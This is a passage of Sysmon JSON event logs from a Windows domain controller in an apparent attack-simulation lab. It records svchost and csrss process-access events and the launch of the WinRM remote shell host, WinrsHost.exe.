{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2420,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010FA520400}\r\nTargetProcessId: 3024\r\nTargetImage: C:\\Windows\\system32\\DllHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010FA520400}","TargetProcessId":"3024","TargetImage":"C:\\Windows\\system32\\DllHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2421,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2422,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.758\r\nProcessGuid: {41C8662E-1F8B-5F25-0000-0010BA590400}\r\nProcessId: 4012\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-1F81-5F25-0000-0020203D0400}\r\nLogonId: 0x43D20\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.758","ProcessGuid":"{41C8662E-1F8B-5F25-0000-0010BA590400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-1F81-5F25-0000-0020203D0400}","LogonId":"0x43d20","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2423,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F81-5F25-0000-0010433E0400}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F81-5F25-0000-0010433E0400}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2424,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F81-5F25-0000-0010433E0400}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F81-5F25-0000-0010433E0400}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2425,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2426,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2427,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2428,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 